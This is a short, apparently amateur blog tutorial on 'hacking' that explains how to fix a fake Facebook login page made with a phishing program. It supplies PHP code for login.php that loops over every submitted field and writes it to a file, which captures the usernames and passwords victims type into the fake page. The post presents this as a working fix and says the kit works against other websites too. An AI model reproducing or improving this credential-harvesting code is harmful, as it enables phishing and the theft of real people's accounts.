this is the tutorials number 4 about hacking
to download the program
i found a problem in this program in making facebook fake page. But fortunately i found it and i solved it so fallow the explanation
the problem is in the file login.php
so open it and replace the code in ther red circle
with this one in the green circle
which is this one
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
save the file
and now it should be working
this problem is just for facebook.com page and with the other websites it's working unless for the ones i tested
0 komentar:
Posting Komentar